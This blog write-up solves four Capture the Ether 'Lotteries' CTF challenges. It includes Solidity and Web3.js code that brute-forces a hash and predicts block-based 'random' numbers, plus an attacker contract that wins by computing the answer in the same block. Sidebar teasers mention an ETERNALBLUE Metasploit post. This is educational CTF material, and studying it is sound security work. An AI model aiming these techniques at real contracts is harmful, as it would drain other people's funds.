Skip to main content

Capture the Ether - Lotteries write-up



Capture the Ether is a "Capture the Flag" style game in which you hack Ethereum smart contracts to learn about security.

Spoiler Alert !

In this write-up, I will go through the first four challenges in the category labeled "Lotteries". Each of these challenges has its own difficulty level and reward points. Basically you can solve them by "guessing?" the right value of a variable in a given smart contract.


Guess the number

The smart contract for this challenge looks like this:

pragma solidity ^0.4.21;
contract GuessTheNumberChallenge {
uint8 answer = 42;
function GuessTheNumberChallenge() public payable {
require(msg.value == 1 ether);
}
function isComplete() public view returns (bool) {
return address(this).balance == 0;
}
function guess(uint8 n) public payable {
require(msg.value == 1 ether);
if (n == answer) {
msg.sender.transfer(2 ether);
}
}
}
It has three functions :

GuessTheNumberChallenge(): a payable constructor that tells you how much Ether is required when deploying the smart contract.

isComplete(): it returns true when the smart contract's balance is equal to 0.

guess(uint8 n): It takes a uint8 as an argument and compares it with the variable declared in line 4. If the numbers are equal, you will have your Ethers sent back to your address. Note that this function is payable and requires exactly 1 Ether to be sent when making a call.

Obviously, all we have to do is to invoke guess() with 42 as an argument. I used Web3.js (Ethereum JavaScript API) and MetaMask  for this.

First you'll need to get the smart contract's ABI that will be used to make a contract instance. the Remix IDE will provide you with everything you need to get this done.

Paste in the code shown bellow and click on "Details"



You can then copy the ABI by clicking on the clipboard icon.


Remember that you can still use Remix to compile, deploy and interact with your smart contracts without having to write any code. I kinda preferred using Web3.js because it's more robust.

The final code to invoke the guess() function should look like this:

var abi = [{"constant":false,"inputs":[{"name":"n","type":"uint8"}],"name":"guess","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"isComplete","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}];
var contract = web3.eth.contract(abi);
var contractInstance = contract.at('0xeD108ab8e7436fAa61b55591262abE1FD2C2E4Cb');
contractInstance.guess(42, {value: 1000000000000000000}, function(err, res) { });

Notice that the transaction must have exactly 1 ether (1e18 wei) in its value field, otherwise it would fail.

Clicking the "Check the solution" button in the game should give this (nice pixel art btw):



Guess the secret number

The code for this challenge is as follow:

pragma solidity ^0.4.21;
contract GuessTheSecretNumberChallenge {
bytes32 answerHash = 0xdb81b4d58595fbbbb592d3661a34cdca14d7ab379441400cbfa1b78bc447c365;
function GuessTheSecretNumberChallenge() public payable {
require(msg.value == 1 ether);
}
function isComplete() public view returns (bool) {
return address(this).balance == 0;
}
function guess(uint8 n) public payable {
require(msg.value == 1 ether);
if (keccak256(n) == answerHash) {
msg.sender.transfer(2 ether);
}
}
}

The challenge says :



Same as the previous challenge, but this time we need to find a number that was hashed using the Keccak-256 hashing algorithm.

By looking at the code, you'll notice that guess() takes a uint8 parameter, and according to the documentation, the highest value of this type is smaller than 2000. Makes things easy, right ?

Now we know that the number we're looking for is less than 2000, we'll need to write a quick script to brute force it.

Here is what I came up with :

var answerHash = '0xdb81b4d58595fbbbb592d3661a34cdca14d7ab379441400cbfa1b78bc447c365';
for(var i=0; i<2000; i++) {
if(web3.sha3(i.toString(16), {encoding: 'hex'}) == answerHash) {
console.log('Answer Found: ' + i);
break;
}
}

Executing it would give 170 as an answer:



Guess the random number

The smart contract given in this one looks like this :

pragma solidity ^0.4.21;
contract GuessTheRandomNumberChallenge {
uint8 answer;
function GuessTheRandomNumberChallenge() public payable {
require(msg.value == 1 ether);
answer = uint8(keccak256(block.blockhash(block.number - 1), now));
}
function isComplete() public view returns (bool) {
return address(this).balance == 0;
}
function guess(uint8 n) public payable {
require(msg.value == 1 ether);
if (n == answer) {
msg.sender.transfer(2 ether);
}
}
}
As you can see, the answer this time is generated based on the hash of the parent block block.blockhash(block.number - 1) and now which is simply an alias for block.timestamp that represents the current block timestamp. The result keccak256 hash is then being casted to uint8.

Our smart contract was deployed to address 0xd5Ce10BE3745114aABf0382556439bA3Ecb2a524. We can easily lookup the block number in which the transaction was included using Etherscan.


Here is the script I used to calculate the answer using the appropriate parent hash and timestamp :

var data = {};
web3.eth.getBlock(3045393, function(err, res) {
data.parentHash = res.parentHash;
data.timestamp = res.timestamp;
var answerHash = web3.sha3([res.parentHash.slice(2), res.timestamp.toString(16).padStart(64, "0")].join(''), {encoding: 'hex'})
data.answer = parseInt(answerHash.slice(-2), 16);
console.log(data);
});
view raw getAnswer.js hosted with ❤ by GitHub

The answer for this challenge was 73.


Guess the new number

In this challenge, the answer is generated on the fly inside the guess() function.

pragma solidity ^0.4.21;
contract GuessTheNewNumberChallenge {
function GuessTheNewNumberChallenge() public payable {
require(msg.value == 1 ether);
}
function isComplete() public view returns (bool) {
return address(this).balance == 0;
}
function guess(uint8 n) public payable {
require(msg.value == 1 ether);
uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));
if (n == answer) {
msg.sender.transfer(2 ether);
}
}
}
We need to guess the block hash and timestamp before our transaction is made, which seems nearly impossible. Note that these two elements can still be influenced to some degree (more details), but the solution to this challenge was much simpler than that.

My first approach to solve this was to predict the block timestamp based on the latest block's timestamp and the average block time which was 14 seconds at the time, and using a higher Gas price to ensure that my transaction is included in the next block.

web3.eth.getBlock('latest', function(e, r) {
var data = {number: r.number, hash: r.hash, timestamp: r.timestamp };
var sha3 = web3.sha3([data.hash.slice(2), (data.timestamp + 14).toString(16).padStart(64, "0")].join(''), {encoding: 'hex'});
data.answer = parseInt(sha3.slice(-2), 16);
contractInstance.guess(data.answer, {value: 1000000000000000000}, function(x, v) { })
});
view raw guess.js hosted with ❤ by GitHub
Unfortunately this didn't work. My transactions always ended up being mined 3-5 blocks ahead.

After a few attempts, I realized that I should be doing this from within a smart contract, since we'll have access to the transaction's properties (block.number and block.timestamp).

Here is the smart contract I made to call guess() from the GuessTheNewNumberChallenge contract with the correct values :

pragma solidity ^0.4.21;
contract GuessTheNewNumberChallenge {
function GuessTheNewNumberChallenge() public payable {
require(msg.value == 1 ether);
}
function isComplete() public view returns (bool) {
return address(this).balance == 0;
}
function guess(uint8 n) public payable {
require(msg.value == 1 ether);
uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));
if (n == answer) {
msg.sender.transfer(2 ether);
}
}
}
contract GuessTheNewNumber {
address contractAddr = 0x1EcdC138B0607AE8f689B6E21EFD9AbEaBee2ACa;
address owner;
function() public payable {}
function GuessTheNewNumber() public payable {
require(msg.value == 1 ether);
owner = msg.sender;
}
function withdraw() public {
owner.transfer(address(this).balance);
}
function mguess() public {
uint8 answer = uint8(keccak256(block.blockhash(block.number - 1), now));
GuessTheNewNumberChallenge s = GuessTheNewNumberChallenge(contractAddr);
s.guess.value(1 ether)(answer);
}
}
Notice that I have declared an unnamed payable function in line 26 which is basically a fallback function. This is what will make our smart contract able to receive Ether through regular transactions. I have also declared a withdraw() function to recover my Ethers later.

https://ropsten.etherscan.io/address/0xeabd25449222897ab4046ee172b0eb9ebbdc0d02#internaltx

And voila, it's done.


Well, that's how far I could get for now. This game was extremely fun and I wish I had more free time to play more.


Comments

Post a Comment

Popular posts from this blog

CSAW CTF 2015 : Forensics 100 - Transfer write-up

Category : Forensics  Points : 100 Challenge Description : I was sniffing some web traffic for a while, I think I finally got something interesting. Help me find flag through all these packets. net_756d631588cb0a400cc16d1848a5f0fb.pcap Opening it up with Wireshark gives some few HTTP packets. After looking through those packets, I noticed that one of them contains the word FLAG. The start of the conversation contains a python script and some random padding at the end which was more likely to be the script's output. Looking through the python script we notice there is a variable called FLAG (censored) that gets encoded with Base64 then looped through one of the following ciphers ROT13, ROT3 and Base64 (randomly chosen).  One thing to mention is that the script keeps the cipher index attached to the encrypted string, this will make it easier for us to reverse the whole thing. I wrote a quick python script to do the decryption : Ex...

Pwning Windows 7 with ETERNALBLUE & DOUBLEPULSAR (Metasploit)

Thanks to @UnaPibaGeek & @pablogonzalezpe for their efforts to develop the Metasploit modules. Modules can be found here (Scanner + Exploit) : https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit This vulnerability affects Windows 2000, Windows XP, Windows 7, Windows 8, Windows Server 2000 up to 2012 R2. How to protect yourself If you still haven't updated your system, you should probably do it right away. If for some reason you aren't able to apply updates, Consider disabling SMB protocols. To disable SMBv1, SMBv2 and SMBv3 under Windows 8 and Windows Server 2012, run the following cmdlets (powershell commands) : Set-SmbServerConfiguration -EnableSMB1Protocol $false Set-SmbServerConfiguration -EnableSMB2Protocol $false For Windows 7, Windows Server 2008 R2, Windows Vista, and Windows Server 2008, you should use these: Set-Ite...